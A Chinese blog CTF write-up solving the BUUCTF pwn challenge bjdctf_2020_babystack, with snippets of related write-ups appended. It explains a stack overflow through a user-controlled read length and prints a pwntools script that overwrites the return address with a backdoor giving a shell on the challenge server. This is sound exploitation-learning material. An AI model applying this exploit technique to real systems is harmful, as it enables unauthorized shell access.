BUUCTF-PWN-bjdctf_2020_babystack1

最新推荐文章于 2025-04-14 19:18:19 发布
最新推荐文章于 2025-04-14 19:18:19 发布
阅读量178 收藏
点赞数 1
文章标签: linux c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_75106749/article/details/134104874
版权

BUUCTF-babystack

执行

信息

逆向: /bin/sh 地址为0x4006E6

main函数地址0x4006FB

第二次读入有明显的溢出漏

在这里插入图片描述

第一次输入的数据是第二次可读入数据的长度,可由此实现栈溢出,构建exp

from pwn import *
​
p = remote('node4.buuoj.cn',28703)
p.sendline('50')#目的是给一个足够大的空间能够输出/bin/sh
flag_addr = 0x4006e6
​
# payload =p64(flag_addr)+b'a'*(0x10+8) 要注意发送字节的顺序,首先填充的是nbytes,所以这条语句会出现EOF 
payload = b'a'*(0x10+8) + p64(flag_addr)
​
p.sendline(payload)
p.interactive()
~                  

flag{58ada9ef-e9b5-46ce-9c8d-ca1b4f03fee9}

Mu_yu_L
关注
日行一PWN bjdctf_2020_babystack 尝试动态调试?
m0_57221101的博客
06-02 536
BUUCTF在线评测 (buuoj.cn)还是buu的题,这次没什么好讲的,一道送分题,但是明白了一个道理,不要太相信ida 的伪代码,那玩意的作用是帮你快速看明白题是在干什么,而不是帮你弄清楚做出这道题的细节。尤其是数据长度部分那么直接来分析首先可以看到,只有NX,和部分RELRO保护ida静态分析也是非常干脆的给出了后门程序主函数更是简单,用scanf来输入一个数字,把这个数字作为我们之后再read中的数据MAX大小。而看上面的接收参数只有0x10个大小(看伪代码此处说只有十二个,其实有16个,非常折磨
BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1695
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
【CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 602
PWN
bjdctf_2020_babystack 1(栈溢出)
最新发布
Snk0xHeart的博客
04-14 234
开虚拟机checksec64位,没开栈保护扔进IDA(64位),找到main,F5反编译没啥东西,点进buf看看(同时注意第8行的nbytes,下面要用到)栈溢出吗?不管了,先数为敬,offset=16-4+8(dq=8)+8-4=24(注:buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出,原本的大小为0,没得读,只有我们为其赋值,我们写入的东西才能让他读(第8行和第18行代码))然后找找后门函数Shift+F12,看看有啥东西可用。
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1540
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
BUUCTF--pwnbjdctf_2020_babystack1
2401_88083440的博客
03-16 230
总结一下思路:首先buf的起始地址距离rbp距离为 0x10 ,我们需要再将 rbp 覆盖掉才能到“返回函数”,然后再将返回函数覆盖成我们的“后门函数”。这里的0x10 其实包含两部分,12是buf本身输入,4是对齐填充(学了计组也懂一点点了嘿)得到一些最基本的信息,比如64位,小端序,只开了NX保护。发现buf的读入可以被nbytes影响,可以进行栈溢出。首先将下载的文件拖入Ubuntu中,check一下。再进入ida64中查看。同时还找到了后门函数。
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 470
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1487
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 635
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 424
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
bjdctf_2020_babystack
zip471642048的博客
06-22 867
checksec 一下 64位程序 没开啥东西 ,ida看一下程序 咋一看read函数读入0个字符串,读了个寂寞,scanf也不能溢出,好像没有问题 但是scanf会读入一个用户输入的数赋值给nbytes ,然后read会读取nbytes大小的字符,也就是说我们可以任意溢出长度 运行这个函数直接拿到shell exp ret 是为了平衡栈 其实往backdoor函数后递+1也行...
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 391
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
buuctf pwn bjdctf_2020_babystack1
m0_74125780的博客
09-28 279
然后又发现有个backdoor函数,里面有system,查看它的地址为0x4006EA。首先用checksec检查。是64位,没有栈保护,及其可能会有栈溢出。打开ida64,read函数栈溢出,buf有24字节大小。然后写代码,那个代码里的30可以变只要大于24就可以覆盖。
BUUCTFbjdctf_2020_babystack Write Up
古月浪子的博客
08-02 772
继续刷buuoj中… 看到上新题了,是当时比赛的时候做过的一道题,顺手打掉 程序只开了NX保护,读入字符数可控,直接ret2text解决 遇到的小问题是,本地环境打0x4006E6打不通,换成了0x4006EA,后来测试远程环境2个都可以,有点迷 =_= from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_lev
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 976
[buuctf]bjdctf_2020_babystack
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 426
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
buuctf pwn rip
03-14
在处理像 `bjdctf_2020_babystack2` 这样的题目时,RIP(指令指针寄存器)控制是实现任意代码执行的关键[^1]。通常情况下,攻击者会通过覆盖返回地址来重定向程序流。 对于这类漏洞利用,常见的技术之一是 Return-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值